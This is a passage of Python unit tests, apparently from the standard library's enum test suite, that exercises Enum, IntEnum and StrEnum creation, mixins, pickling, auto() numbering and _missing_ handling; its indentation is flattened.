self.assertEqual(
[SummerMonth.june, SummerMonth.july, SummerMonth.august],
lst,
)
for i, month in enumerate('june july august'.split(), 1):
e = SummerMonth(i)
self.assertEqual(e, i)
self.assertEqual(e.name, month)
self.assertIn(e, SummerMonth)
self.assertIs(type(e), SummerMonth)
def test_programmatic_function_type_with_start(self):
SummerMonth = Enum('SummerMonth', 'june july august', type=int, start=30)
lst = list(SummerMonth)
self.assertEqual(len(lst), len(SummerMonth))
self.assertEqual(len(SummerMonth), 3, SummerMonth)
self.assertEqual(
[SummerMonth.june, SummerMonth.july, SummerMonth.august],
lst,
)
for i, month in enumerate('june july august'.split(), 30):
e = SummerMonth(i)
self.assertEqual(e, i)
self.assertEqual(e.name, month)
self.assertIn(e, SummerMonth)
self.assertIs(type(e), SummerMonth)
def test_programmatic_function_type_from_subclass(self):
SummerMonth = IntEnum('SummerMonth', 'june july august')
lst = list(SummerMonth)
self.assertEqual(len(lst), len(SummerMonth))
self.assertEqual(len(SummerMonth), 3, SummerMonth)
self.assertEqual(
[SummerMonth.june, SummerMonth.july, SummerMonth.august],
lst,
)
for i, month in enumerate('june july august'.split(), 1):
e = SummerMonth(i)
self.assertEqual(e, i)
self.assertEqual(e.name, month)
self.assertIn(e, SummerMonth)
self.assertIs(type(e), SummerMonth)
def test_programmatic_function_type_from_subclass_with_start(self):
SummerMonth = IntEnum('SummerMonth', 'june july august', start=40)
lst = list(SummerMonth)
self.assertEqual(len(lst), len(SummerMonth))
self.assertEqual(len(SummerMonth), 3, SummerMonth)
self.assertEqual(
[SummerMonth.june, SummerMonth.july, SummerMonth.august],
lst,
)
for i, month in enumerate('june july august'.split(), 40):
e = SummerMonth(i)
self.assertEqual(e, i)
self.assertEqual(e.name, month)
self.assertIn(e, SummerMonth)
self.assertIs(type(e), SummerMonth)
def test_subclassing(self):
if isinstance(Name, Exception):
raise Name
self.assertEqual(Name.BDFL, 'Guido van Rossum')
        self.assertIs(Name.BDFL, Name('Guido van Rossum'))
self.assertIs(Name.BDFL, getattr(Name, 'BDFL'))
test_pickle_dump_load(self.assertIs, Name.BDFL)
def test_extending(self):
class Color(Enum):
red = 1
green = 2
blue = 3
with self.assertRaises(TypeError):
class MoreColor(Color):
cyan = 4
magenta = 5
yellow = 6
with self.assertRaisesRegex(TypeError, "EvenMoreColor: cannot extend enumeration 'Color'"):
class EvenMoreColor(Color, IntEnum):
chartruese = 7
def test_exclude_methods(self):
class whatever(Enum):
this = 'that'
these = 'those'
def really(self):
return 'no, not %s' % self.value
self.assertIsNot(type(whatever.really), whatever)
self.assertEqual(whatever.this.really(), 'no, not that')
def test_wrong_inheritance_order(self):
with self.assertRaises(TypeError):
class Wrong(Enum, str):
NotHere = 'error before this point'
def test_intenum_transitivity(self):
class number(IntEnum):
one = 1
two = 2
three = 3
class numero(IntEnum):
uno = 1
dos = 2
tres = 3
self.assertEqual(number.one, numero.uno)
self.assertEqual(number.two, numero.dos)
self.assertEqual(number.three, numero.tres)
def test_wrong_enum_in_call(self):
class Monochrome(Enum):
black = 0
white = 1
class Gender(Enum):
male = 0
female = 1
self.assertRaises(ValueError, Monochrome, Gender.male)
def test_wrong_enum_in_mixed_call(self):
class Monochrome(IntEnum):
black = 0
white = 1
class Gender(Enum):
male = 0
female = 1
self.assertRaises(ValueError, Monochrome, Gender.male)
def test_mixed_enum_in_call_1(self):
class Monochrome(IntEnum):
black = 0
white = 1
class Gender(IntEnum):
male = 0
female = 1
self.assertIs(Monochrome(Gender.female), Monochrome.white)
def test_mixed_enum_in_call_2(self):
class Monochrome(Enum):
black = 0
white = 1
class Gender(IntEnum):
male = 0
female = 1
self.assertIs(Monochrome(Gender.male), Monochrome.black)
def test_flufl_enum(self):
class Fluflnum(Enum):
def __int__(self):
return int(self.value)
class MailManOptions(Fluflnum):
option1 = 1
option2 = 2
option3 = 3
self.assertEqual(int(MailManOptions.option1), 1)
def test_introspection(self):
class Number(IntEnum):
one = 100
two = 200
self.assertIs(Number.one._member_type_, int)
self.assertIs(Number._member_type_, int)
class String(str, Enum):
yarn = 'soft'
rope = 'rough'
wire = 'hard'
self.assertIs(String.yarn._member_type_, str)
self.assertIs(String._member_type_, str)
class Plain(Enum):
vanilla = 'white'
one = 1
self.assertIs(Plain.vanilla._member_type_, object)
self.assertIs(Plain._member_type_, object)
def test_no_such_enum_member(self):
class Color(Enum):
red = 1
green = 2
blue = 3
with self.assertRaises(ValueError):
Color(4)
with self.assertRaises(KeyError):
Color['chartreuse']
def test_new_repr(self):
class Color(Enum):
red = 1
green = 2
blue = 3
def __repr__(self):
return "don't you just love shades of %s?" % self.name
self.assertEqual(
repr(Color.blue),
"don't you just love shades of blue?",
)
def test_inherited_repr(self):
class MyEnum(Enum):
def __repr__(self):
return "My name is %s." % self.name
class MyIntEnum(int, MyEnum):
this = 1
that = 2
theother = 3
self.assertEqual(repr(MyIntEnum.that), "My name is that.")
def test_multiple_mixin_mro(self):
class auto_enum(type(Enum)):
def __new__(metacls, cls, bases, classdict):
temp = type(classdict)()
temp._cls_name = cls
names = set(classdict._member_names)
i = 0
for k in classdict._member_names:
v = classdict[k]
if v is Ellipsis:
v = i
else:
i = v
i += 1
temp[k] = v
for k, v in classdict.items():
if k not in names:
temp[k] = v
return super(auto_enum, metacls).__new__(
metacls, cls, bases, temp)
class AutoNumberedEnum(Enum, metaclass=auto_enum):
pass
class AutoIntEnum(IntEnum, metaclass=auto_enum):
pass
class TestAutoNumber(AutoNumberedEnum):
a = ...
b = 3
c = ...
class TestAutoInt(AutoIntEnum):
a = ...
b = 3
c = ...
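        # auto_enum swaps an Ellipsis value for a running counter that also
        # advances past explicit values, so both classes end up with
        # a = 0, b = 3, c = 4.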
def test_subclasses_with_getnewargs(self):
class NamedInt(int):
__qualname__ = 'NamedInt' # needed for pickle protocol 4
def __new__(cls, *args):
_args = args
name, *args = args
if len(args) == 0:
raise TypeError("name and value must be specified")
self = int.__new__(cls, *args)
self._intname = name
self._args = _args
return self
def __getnewargs__(self):
return self._args
@property
def __name__(self):
return self._intname
def __repr__(self):
# repr() is updated to include the name and type info
return "{}({!r}, {})".format(
type(self).__name__,
self.__name__,
int.__repr__(self),
)
def __str__(self):
# str() is unchanged, even if it relies on the repr() fallback
base = int
base_str = base.__str__
if base_str.__objclass__ is object:
return base.__repr__(self)
return base_str(self)
# for simplicity, we only define one operator that
# propagates expressions
def __add__(self, other):
                temp = int(self) + int(other)
if isinstance(self, NamedInt) and isinstance(other, NamedInt):
return NamedInt(
'({0} + {1})'.format(self.__name__, other.__name__),
temp,
)
else:
return temp
class NEI(NamedInt, Enum):
__qualname__ = 'NEI' # needed for pickle protocol 4
x = ('the-x', 1)
y = ('the-y', 2)
self.assertIs(NEI.__new__, Enum.__new__)
self.assertEqual(repr(NEI.x + NEI.y), "NamedInt('(the-x + the-y)', 3)")
globals()['NamedInt'] = NamedInt
globals()['NEI'] = NEI
NI5 = NamedInt('test', 5)
self.assertEqual(NI5, 5)
test_pickle_dump_load(self.assertEqual, NI5, 5)
self.assertEqual(NEI.y.value, 2)
test_pickle_dump_load(self.assertIs, NEI.y)
test_pickle_dump_load(self.assertIs, NEI)
def test_subclasses_with_getnewargs_ex(self):
class NamedInt(int):
__qualname__ = 'NamedInt' # needed for pickle protocol 4
def __new__(cls, *args):
_args = args
name, *args = args
if len(args) == 0:
raise TypeError("name and value must be specified")
self = int.__new__(cls, *args)
self._intname = name
self._args = _args
return self
def __getnewargs_ex__(self):
return self._args, {}
@property
def __name__(self):
return self._intname
def __repr__(self):
# repr() is updated to include the name and type info
return "{}({!r}, {})".format(
type(self).__name__,
self.__name__,
int.__repr__(self),
)
def __str__(self):
# str() is unchanged, even if it relies on the repr() fallback
base = int
base_str = base.__str__
if base_str.__objclass__ is object:
return base.__repr__(self)
return base_str(self)
# for simplicity, we only define one operator that
# propagates expressions
def __add__(self, other):
                temp = int(self) + int(other)
if isinstance(self, NamedInt) and isinstance(other, NamedInt):
return NamedInt(
'({0} + {1})'.format(self.__name__, other.__name__),
temp,
)
else:
return temp
class NEI(NamedInt, Enum):
__qualname__ = 'NEI' # needed for pickle protocol 4
x = ('the-x', 1)
y = ('the-y', 2)
self.assertIs(NEI.__new__, Enum.__new__)
self.assertEqual(repr(NEI.x + NEI.y), "NamedInt('(the-x + the-y)', 3)")
globals()['NamedInt'] = NamedInt
globals()['NEI'] = NEI
NI5 = NamedInt('test', 5)
self.assertEqual(NI5, 5)
test_pickle_dump_load(self.assertEqual, NI5, 5)
self.assertEqual(NEI.y.value, 2)
test_pickle_dump_load(self.assertIs, NEI.y)
test_pickle_dump_load(self.assertIs, NEI)
def test_subclasses_with_reduce(self):
class NamedInt(int):
__qualname__ = 'NamedInt' # needed for pickle protocol 4
def __new__(cls, *args):
_args = args
name, *args = args
if len(args) == 0:
raise TypeError("name and value must be specified")
self = int.__new__(cls, *args)
self._intname = name
self._args = _args
return self
def __reduce__(self):
return self.__class__, self._args
@property
def __name__(self):
return self._intname
def __repr__(self):
# repr() is updated to include the name and type info
return "{}({!r}, {})".format(
type(self).__name__,
self.__name__,
int.__repr__(self),
)
def __str__(self):
# str() is unchanged, even if it relies on the repr() fallback
base = int
base_str = base.__str__
if base_str.__objclass__ is object:
return base.__repr__(self)
return base_str(self)
# for simplicity, we only define one operator that
# propagates expressions
def __add__(self, other):
                temp = int(self) + int(other)
if isinstance(self, NamedInt) and isinstance(other, NamedInt):
return NamedInt(
'({0} + {1})'.format(self.__name__, other.__name__),
temp,
)
else:
return temp
class NEI(NamedInt, Enum):
__qualname__ = 'NEI' # needed for pickle protocol 4
x = ('the-x', 1)
y = ('the-y', 2)
self.assertIs(NEI.__new__, Enum.__new__)
self.assertEqual(repr(NEI.x + NEI.y), "NamedInt('(the-x + the-y)', 3)")
globals()['NamedInt'] = NamedInt
globals()['NEI'] = NEI
NI5 = NamedInt('test', 5)
self.assertEqual(NI5, 5)
test_pickle_dump_load(self.assertEqual, NI5, 5)
self.assertEqual(NEI.y.value, 2)
test_pickle_dump_load(self.assertIs, NEI.y)
test_pickle_dump_load(self.assertIs, NEI)
def test_subclasses_with_reduce_ex(self):
class NamedInt(int):
__qualname__ = 'NamedInt' # needed for pickle protocol 4
def __new__(cls, *args):
_args = args
name, *args = args
if len(args) == 0:
raise TypeError("name and value must be specified")
self = int.__new__(cls, *args)
self._intname = name
self._args = _args
return self
def __reduce_ex__(self, proto):
return self.__class__, self._args
@property
def __name__(self):
return self._intname
def __repr__(self):
# repr() is updated to include the name and type info
return "{}({!r}, {})".format(
type(self).__name__,
self.__name__,
int.__repr__(self),
)
def __str__(self):
# str() is unchanged, even if it relies on the repr() fallback
base = int
base_str = base.__str__
if base_str.__objclass__ is object:
return base.__repr__(self)
return base_str(self)
# for simplicity, we only define one operator that
# propagates expressions
def __add__(self, other):
                temp = int(self) + int(other)
if isinstance(self, NamedInt) and isinstance(other, NamedInt):
return NamedInt(
'({0} + {1})'.format(self.__name__, other.__name__),
temp,
)
else:
return temp
class NEI(NamedInt, Enum):
__qualname__ = 'NEI' # needed for pickle protocol 4
x = ('the-x', 1)
y = ('the-y', 2)
self.assertIs(NEI.__new__, Enum.__new__)
self.assertEqual(repr(NEI.x + NEI.y), "NamedInt('(the-x + the-y)', 3)")
globals()['NamedInt'] = NamedInt
globals()['NEI'] = NEI
NI5 = NamedInt('test', 5)
self.assertEqual(NI5, 5)
test_pickle_dump_load(self.assertEqual, NI5, 5)
self.assertEqual(NEI.y.value, 2)
test_pickle_dump_load(self.assertIs, NEI.y)
test_pickle_dump_load(self.assertIs, NEI)
def test_subclasses_without_direct_pickle_support(self):
class NamedInt(int):
__qualname__ = 'NamedInt'
def __new__(cls, *args):
_args = args
name, *args = args
if len(args) == 0:
raise TypeError("name and value must be specified")
self = int.__new__(cls, *args)
self._intname = name
self._args = _args
return self
@property
def __name__(self):
return self._intname
def __repr__(self):
# repr() is updated to include the name and type info
return "{}({!r}, {})".format(
type(self).__name__,
self.__name__,
int.__repr__(self),
)
def __str__(self):
# str() is unchanged, even if it relies on the repr() fallback
base = int
base_str = base.__str__
if base_str.__objclass__ is object:
return base.__repr__(self)
return base_str(self)
# for simplicity, we only define one operator that
# propagates expressions
def __add__(self, other):
                temp = int(self) + int(other)
if isinstance(self, NamedInt) and isinstance(other, NamedInt):
return NamedInt(
'({0} + {1})'.format(self.__name__, other.__name__),
temp )
else:
return temp
class NEI(NamedInt, Enum):
__qualname__ = 'NEI'
x = ('the-x', 1)
y = ('the-y', 2)
self.assertIs(NEI.__new__, Enum.__new__)
self.assertEqual(repr(NEI.x + NEI.y), "NamedInt('(the-x + the-y)', 3)")
globals()['NamedInt'] = NamedInt
globals()['NEI'] = NEI
NI5 = NamedInt('test', 5)
self.assertEqual(NI5, 5)
self.assertEqual(NEI.y.value, 2)
test_pickle_dump_load(self.assertIs, NEI.y)
test_pickle_dump_load(self.assertIs, NEI)
def test_subclasses_with_direct_pickle_support(self):
class NamedInt(int):
__qualname__ = 'NamedInt'
def __new__(cls, *args):
_args = args
name, *args = args
if len(args) == 0:
raise TypeError("name and value must be specified")
self = int.__new__(cls, *args)
self._intname = name
self._args = _args
return self
@property
def __name__(self):
return self._intname
def __repr__(self):
# repr() is updated to include the name and type info
return "{}({!r}, {})".format(
type(self).__name__,
self.__name__,
int.__repr__(self),
)
def __str__(self):
# str() is unchanged, even if it relies on the repr() fallback
base = int
base_str = base.__str__
if base_str.__objclass__ is object:
return base.__repr__(self)
return base_str(self)
# for simplicity, we only define one operator that
# propagates expressions
def __add__(self, other):
                temp = int(self) + int(other)
if isinstance(self, NamedInt) and isinstance(other, NamedInt):
return NamedInt(
'({0} + {1})'.format(self.__name__, other.__name__),
temp,
)
else:
return temp
class NEI(NamedInt, Enum):
__qualname__ = 'NEI'
x = ('the-x', 1)
y = ('the-y', 2)
def __reduce_ex__(self, proto):
return getattr, (self.__class__, self._name_)
self.assertIs(NEI.__new__, Enum.__new__)
self.assertEqual(repr(NEI.x + NEI.y), "NamedInt('(the-x + the-y)', 3)")
globals()['NamedInt'] = NamedInt
globals()['NEI'] = NEI
NI5 = NamedInt('test', 5)
self.assertEqual(NI5, 5)
self.assertEqual(NEI.y.value, 2)
test_pickle_dump_load(self.assertIs, NEI.y)
test_pickle_dump_load(self.assertIs, NEI)
def test_tuple_subclass(self):
class SomeTuple(tuple, Enum):
__qualname__ = 'SomeTuple' # needed for pickle protocol 4
first = (1, 'for the money')
second = (2, 'for the show')
third = (3, 'for the music')
self.assertIs(type(SomeTuple.first), SomeTuple)
self.assertIsInstance(SomeTuple.second, tuple)
self.assertEqual(SomeTuple.third, (3, 'for the music'))
globals()['SomeTuple'] = SomeTuple
test_pickle_dump_load(self.assertIs, SomeTuple.first)
def test_duplicate_values_give_unique_enum_items(self):
class AutoNumber(Enum):
first = ()
second = ()
third = ()
def __new__(cls):
value = len(cls.__members__) + 1
obj = object.__new__(cls)
obj._value_ = value
return obj
def __int__(self):
return int(self._value_)
self.assertEqual(
list(AutoNumber),
[AutoNumber.first, AutoNumber.second, AutoNumber.third],
)
self.assertEqual(int(AutoNumber.second), 2)
self.assertEqual(AutoNumber.third.value, 3)
self.assertIs(AutoNumber(1), AutoNumber.first)
def test_inherited_new_from_enhanced_enum(self):
class AutoNumber(Enum):
def __new__(cls):
value = len(cls.__members__) + 1
obj = object.__new__(cls)
obj._value_ = value
return obj
def __int__(self):
return int(self._value_)
class Color(AutoNumber):
red = ()
green = ()
blue = ()
self.assertEqual(list(Color), [Color.red, Color.green, Color.blue])
self.assertEqual(list(map(int, Color)), [1, 2, 3])
def test_inherited_new_from_mixed_enum(self):
class AutoNumber(IntEnum):
def __new__(cls):
value = len(cls.__members__) + 1
obj = int.__new__(cls, value)
obj._value_ = value
return obj
class Color(AutoNumber):
red = ()
green = ()
blue = ()
self.assertEqual(list(Color), [Color.red, Color.green, Color.blue])
self.assertEqual(list(map(int, Color)), [1, 2, 3])
def test_equality(self):
class OrdinaryEnum(Enum):
a = 1
self.assertEqual(ALWAYS_EQ, OrdinaryEnum.a)
self.assertEqual(OrdinaryEnum.a, ALWAYS_EQ)
def test_ordered_mixin(self):
class OrderedEnum(Enum):
def __ge__(self, other):
if self.__class__ is other.__class__:
return self._value_ >= other._value_
return NotImplemented
def __gt__(self, other):
if self.__class__ is other.__class__:
return self._value_ > other._value_
return NotImplemented
def __le__(self, other):
if self.__class__ is other.__class__:
return self._value_ <= other._value_
return NotImplemented
def __lt__(self, other):
if self.__class__ is other.__class__:
return self._value_ < other._value_
return NotImplemented
class Grade(OrderedEnum):
A = 5
B = 4
C = 3
D = 2
F = 1
self.assertGreater(Grade.A, Grade.B)
self.assertLessEqual(Grade.F, Grade.C)
self.assertLess(Grade.D, Grade.A)
self.assertGreaterEqual(Grade.B, Grade.B)
self.assertEqual(Grade.B, Grade.B)
self.assertNotEqual(Grade.C, Grade.D)
def test_extending2(self):
class Shade(Enum):
def shade(self):
print(self.name)
class Color(Shade):
red = 1
green = 2
blue = 3
with self.assertRaises(TypeError):
class MoreColor(Color):
cyan = 4
magenta = 5
yellow = 6
def test_extending3(self):
class Shade(Enum):
def shade(self):
return self.name
class Color(Shade):
def hex(self):
return '%s hexlified!' % self.value
class MoreColor(Color):
cyan = 4
magenta = 5
yellow = 6
self.assertEqual(MoreColor.magenta.hex(), '5 hexlified!')
def test_subclass_duplicate_name(self):
class Base(Enum):
def test(self):
pass
class Test(Base):
test = 1
self.assertIs(type(Test.test), Test)
def test_subclass_duplicate_name_dynamic(self):
from types import DynamicClassAttribute
class Base(Enum):
@DynamicClassAttribute
def test(self):
return 'dynamic'
class Test(Base):
test = 1
self.assertEqual(Test.test.test, 'dynamic')
class Base2(Enum):
@enum.property
def flash(self):
return 'flashy dynamic'
class Test(Base2):
flash = 1
self.assertEqual(Test.flash.flash, 'flashy dynamic')
def test_no_duplicates(self):
class UniqueEnum(Enum):
def __init__(self, *args):
cls = self.__class__
if any(self.value == e.value for e in cls):
a = self.name
e = cls(self.value).name
raise ValueError(
"aliases not allowed in UniqueEnum: %r --> %r"
% (a, e)
)
class Color(UniqueEnum):
red = 1
green = 2
blue = 3
with self.assertRaises(ValueError):
class Color(UniqueEnum):
red = 1
green = 2
blue = 3
grene = 2
def test_init(self):
class Planet(Enum):
MERCURY = (3.303e+23, 2.4397e6)
VENUS = (4.869e+24, 6.0518e6)
EARTH = (5.976e+24, 6.37814e6)
MARS = (6.421e+23, 3.3972e6)
JUPITER = (1.9e+27, 7.1492e7)
SATURN = (5.688e+26, 6.0268e7)
URANUS = (8.686e+25, 2.5559e7)
NEPTUNE = (1.024e+26, 2.4746e7)
def __init__(self, mass, radius):
self.mass = mass # in kilograms
self.radius = radius # in meters
@property
def surface_gravity(self):
# universal gravitational constant (m^3 kg^-1 s^-2)
G = 6.67300E-11
return G * self.mass / (self.radius * self.radius)
self.assertEqual(round(Planet.EARTH.surface_gravity, 2), 9.80)
self.assertEqual(Planet.EARTH.value, (5.976e+24, 6.37814e6))
def test_ignore(self):
class Period(timedelta, Enum):
'''
different lengths of time
'''
def __new__(cls, value, period):
obj = timedelta.__new__(cls, value)
obj._value_ = value
obj.period = period
return obj
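# names listed in _ignore_ are scratch variables: they are removed from the
# class namespace and never become members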
_ignore_ = 'Period i'
Period = vars()
for i in range(13):
Period['month_%d' % i] = i*30, 'month'
for i in range(53):
Period['week_%d' % i] = i*7, 'week'
for i in range(32):
Period['day_%d' % i] = i, 'day'
OneDay = day_1
OneWeek = week_1
OneMonth = month_1
self.assertFalse(hasattr(Period, '_ignore_'))
self.assertFalse(hasattr(Period, 'Period'))
self.assertFalse(hasattr(Period, 'i'))
self.assertTrue(isinstance(Period.day_1, timedelta))
self.assertTrue(Period.month_1 is Period.day_30)
self.assertTrue(Period.week_4 is Period.day_28)
def test_nonhash_value(self):
class AutoNumberInAList(Enum):
def __new__(cls):
value = [len(cls.__members__) + 1]
obj = object.__new__(cls)
obj._value_ = value
return obj
class ColorInAList(AutoNumberInAList):
red = ()
green = ()
blue = ()
self.assertEqual(list(ColorInAList), [ColorInAList.red, ColorInAList.green, ColorInAList.blue])
for member, value in zip(ColorInAList, range(3)):
value += 1
self.assertEqual(member.value, [value])
self.assertIs(ColorInAList([value]), member)
def test_conflicting_types_resolved_in_new(self):
class LabelledIntEnum(int, Enum):
def __new__(cls, *args):
value, label = args
obj = int.__new__(cls, value)
obj.label = label
obj._value_ = value
return obj
class LabelledList(LabelledIntEnum):
unprocessed = (1, "Unprocessed")
payment_complete = (2, "Payment Complete")
self.assertEqual(list(LabelledList), [LabelledList.unprocessed, LabelledList.payment_complete])
self.assertEqual(LabelledList.unprocessed, 1)
self.assertEqual(LabelledList(1), LabelledList.unprocessed)
def test_auto_number(self):
class Color(Enum):
red = auto()
blue = auto()
green = auto()
self.assertEqual(list(Color), [Color.red, Color.blue, Color.green])
self.assertEqual(Color.red.value, 1)
self.assertEqual(Color.blue.value, 2)
self.assertEqual(Color.green.value, 3)
def test_auto_name(self):
class Color(Enum):
def _generate_next_value_(name, start, count, last):
return name
red = auto()
blue = auto()
green = auto()
self.assertEqual(list(Color), [Color.red, Color.blue, Color.green])
self.assertEqual(Color.red.value, 'red')
self.assertEqual(Color.blue.value, 'blue')
self.assertEqual(Color.green.value, 'green')
def test_auto_name_inherit(self):
class AutoNameEnum(Enum):
def _generate_next_value_(name, start, count, last):
return name
class Color(AutoNameEnum):
red = auto()
blue = auto()
green = auto()
self.assertEqual(list(Color), [Color.red, Color.blue, Color.green])
self.assertEqual(Color.red.value, 'red')
self.assertEqual(Color.blue.value, 'blue')
self.assertEqual(Color.green.value, 'green')
def test_auto_garbage(self):
class Color(Enum):
red = 'red'
blue = auto()
self.assertEqual(Color.blue.value, 1)
def test_auto_garbage_corrected(self):
class Color(Enum):
red = 'red'
blue = 2
green = auto()
self.assertEqual(list(Color), [Color.red, Color.blue, Color.green])
self.assertEqual(Color.red.value, 'red')
self.assertEqual(Color.blue.value, 2)
self.assertEqual(Color.green.value, 3)
def test_auto_order(self):
with self.assertRaises(TypeError):
class Color(Enum):
red = auto()
green = auto()
blue = auto()
def _generate_next_value_(name, start, count, last):
return name
def test_auto_order_weird(self):
weird_auto = auto()
weird_auto.value = 'pathological case'
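# giving the auto() instance an explicit value bypasses _generate_next_value_ for that member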
class Color(Enum):
red = weird_auto
def _generate_next_value_(name, start, count, last):
return name
blue = auto()
self.assertEqual(list(Color), [Color.red, Color.blue])
self.assertEqual(Color.red.value, 'pathological case')
self.assertEqual(Color.blue.value, 'blue')
def test_duplicate_auto(self):
class Dupes(Enum):
first = primero = auto()
second = auto()
third = auto()
self.assertEqual([Dupes.first, Dupes.second, Dupes.third], list(Dupes))
def test_default_missing(self):
class Color(Enum):
RED = 1
GREEN = 2
BLUE = 3
try:
Color(7)
except ValueError as exc:
self.assertTrue(exc.__context__ is None)
else:
raise Exception('Exception not raised.')
def test_missing(self):
class Color(Enum):
red = 1
green = 2
blue = 3
@classmethod
def _missing_(cls, item):
if item == 'three':
return cls.blue
elif item == 'bad return':
# trigger internal error
return 5
elif item == 'error out':
raise ZeroDivisionError
else:
# trigger not found
return None
self.assertIs(Color('three'), Color.blue)
try:
Color(7)
except ValueError as exc:
self.assertTrue(exc.__context__ is None)
else:
raise Exception('Exception not raised.')
try:
Color('bad return')
except TypeError as exc:
self.assertTrue(isinstance(exc.__context__, ValueError))
else:
raise Exception('Exception not raised.')
try:
Color('error out')
except ZeroDivisionError as exc:
self.assertTrue(isinstance(exc.__context__, ValueError))
else:
raise Exception('Exception not raised.')
def test_missing_exceptions_reset(self):
import weakref
#
class TestEnum(enum.Enum):
VAL1 = 'val1'
VAL2 = 'val2'
#
class Class1:
def __init__(self):
# Gracefully handle an exception of our own making
try:
raise ValueError()
except ValueError:
pass
#
class Class2:
def __init__(self):
# Gracefully handle an exception of Enum's making
try:
TestEnum('invalid_value')
except ValueError:
pass
# No strong refs here so these are free to die.
class_1_ref = weakref.ref(Class1())
class_2_ref = weakref.ref(Class2())
#
# The exception raised by Enum used to create a reference loop, so
# Class2 instances would stick around until the next garbage collection
# cycle, unlike Class1; both should now be collected immediately.
self.assertIs(class_1_ref(), None)
self.assertIs(class_2_ref(), None)
def test_multiple_mixin(self):
class MaxMixin:
@classproperty
def MAX(cls):
max = len(cls)
cls.MAX = max
return max
class StrMixin:
def __str__(self):
return self._name_.lower()
class SomeEnum(Enum):
def behavior(self):
return 'booyah'
class AnotherEnum(Enum):
def behavior(self):
return 'nuhuh!'
def social(self):
return "what's up?"
class Color(MaxMixin, Enum):
RED = auto()
GREEN = auto()
BLUE = auto()
self.assertEqual(Color.RED.value, 1)
self.assertEqual(Color.GREEN.value, 2)
self.assertEqual(Color.BLUE.value, 3)
self.assertEqual(Color.MAX, 3)
self.assertEqual(str(Color.BLUE), 'BLUE')
class Color(MaxMixin, StrMixin, Enum):
RED = auto()
GREEN = auto()
BLUE = auto()
self.assertEqual(Color.RED.value, 1)
self.assertEqual(Color.GREEN.value, 2)
self.assertEqual(Color.BLUE.value, 3)
self.assertEqual(Color.MAX, 3)
self.assertEqual(str(Color.BLUE), 'blue')
class Color(StrMixin, MaxMixin, Enum):
RED = auto()
GREEN = auto()
BLUE = auto()
self.assertEqual(Color.RED.value, 1)
self.assertEqual(Color.GREEN.value, 2)
self.assertEqual(Color.BLUE.value, 3)
self.assertEqual(Color.MAX, 3)
self.assertEqual(str(Color.BLUE), 'blue')
class CoolColor(StrMixin, SomeEnum, Enum):
RED = auto()
GREEN = auto()
BLUE = auto()
self.assertEqual(CoolColor.RED.value, 1)
self.assertEqual(CoolColor.GREEN.value, 2)
self.assertEqual(CoolColor.BLUE.value, 3)
self.assertEqual(str(CoolColor.BLUE), 'blue')
self.assertEqual(CoolColor.RED.behavior(), 'booyah')
class CoolerColor(StrMixin, AnotherEnum, Enum):
RED = auto()
GREEN = auto()
BLUE = auto()
self.assertEqual(CoolerColor.RED.value, 1)
self.assertEqual(CoolerColor.GREEN.value, 2)
self.assertEqual(CoolerColor.BLUE.value, 3)
self.assertEqual(str(CoolerColor.BLUE), 'blue')
self.assertEqual(CoolerColor.RED.behavior(), 'nuhuh!')
self.assertEqual(CoolerColor.RED.social(), "what's up?")
class CoolestColor(StrMixin, SomeEnum, AnotherEnum):
RED = auto()
GREEN = auto()
BLUE = auto()
self.assertEqual(CoolestColor.RED.value, 1)
self.assertEqual(CoolestColor.GREEN.value, 2)
self.assertEqual(CoolestColor.BLUE.value, 3)
self.assertEqual(str(CoolestColor.BLUE), 'blue')
self.assertEqual(CoolestColor.RED.behavior(), 'booyah')
self.assertEqual(CoolestColor.RED.social(), "what's up?")
class ConfusedColor(StrMixin, AnotherEnum, SomeEnum):
RED = auto()
GREEN = auto()
BLUE = auto()
self.assertEqual(ConfusedColor.RED.value, 1)
self.assertEqual(ConfusedColor.GREEN.value, 2)
self.assertEqual(ConfusedColor.BLUE.value, 3)
self.assertEqual(str(ConfusedColor.BLUE), 'blue')
self.assertEqual(ConfusedColor.RED.behavior(), 'nuhuh!')
self.assertEqual(ConfusedColor.RED.social(), "what's up?")
class ReformedColor(StrMixin, IntEnum, SomeEnum, AnotherEnum):
RED = auto()
GREEN = auto()
BLUE = auto()
self.assertEqual(ReformedColor.RED.value, 1)
self.assertEqual(ReformedColor.GREEN.value, 2)
self.assertEqual(ReformedColor.BLUE.value, 3)
self.assertEqual(str(ReformedColor.BLUE), 'blue')
self.assertEqual(ReformedColor.RED.behavior(), 'booyah')
self.assertEqual(ConfusedColor.RED.social(), "what's up?")
self.assertTrue(issubclass(ReformedColor, int))
def test_multiple_inherited_mixin(self):
@unique
class Decision1(StrEnum):
REVERT = "REVERT"
REVERT_ALL = "REVERT_ALL"
RETRY = "RETRY"
class MyEnum(StrEnum):
pass
@unique
class Decision2(MyEnum):
REVERT = "REVERT"
REVERT_ALL = "REVERT_ALL"
RETRY = "RETRY"
def test_multiple_mixin_inherited(self):
class MyInt(int):
def __new__(cls, value):
return super().__new__(cls, value)
class HexMixin:
def __repr__(self):
return hex(self)
class MyIntEnum(HexMixin, MyInt, enum.Enum):
pass
class Foo(MyIntEnum):
TEST = 1
self.assertTrue(isinstance(Foo.TEST, MyInt))
self.assertEqual(repr(Foo.TEST), "0x1")
class Fee(MyIntEnum):
TEST = 1
def __new__(cls, value):
value += 1
member = int.__new__(cls, value)
member._value_ = value
return member
self.assertEqual(Fee.TEST, 2)
def test_multiple_mixin_with_common_data_type(self):
class CaseInsensitiveStrEnum(str, Enum):
@classmethod
def _missing_(cls, value):
for member in cls._member_map_.values():
if member._value_.lower() == value.lower():
return member
return super()._missing_(value)
#
class LenientStrEnum(str, Enum):
def __init__(self, *args):
self._valid = True
@classmethod
def _missing_(cls, value):
unknown = cls._member_type_.__new__(cls, value)
unknown._valid = False
unknown._name_ = value.upper()
unknown._value_ = value
cls._member_map_[value] = unknown
return unknown
@property
def valid(self):
return self._valid
#
class JobStatus(CaseInsensitiveStrEnum, LenientStrEnum):
ACTIVE = "active"
PENDING = "pending"
TERMINATED = "terminated"
#
JS = JobStatus
self.assertEqual(list(JobStatus), [JS.ACTIVE, JS.PENDING, JS.TERMINATED])
self.assertEqual(JS.ACTIVE, 'active')
self.assertEqual(JS.ACTIVE.value, 'active')
self.assertIs(JS('Active'), JS.ACTIVE)
self.assertTrue(JS.ACTIVE.valid)
missing = JS('missing')
self.assertEqual(list(JobStatus), [JS.ACTIVE, JS.PENDING, JS.TERMINATED])
self.assertEqual(JS.ACTIVE, 'active')
self.assertEqual(JS.ACTIVE.value, 'active')
self.assertIs(JS('Active'), JS.ACTIVE)
self.assertTrue(JS.ACTIVE.valid)
self.assertTrue(isinstance(missing, JS))
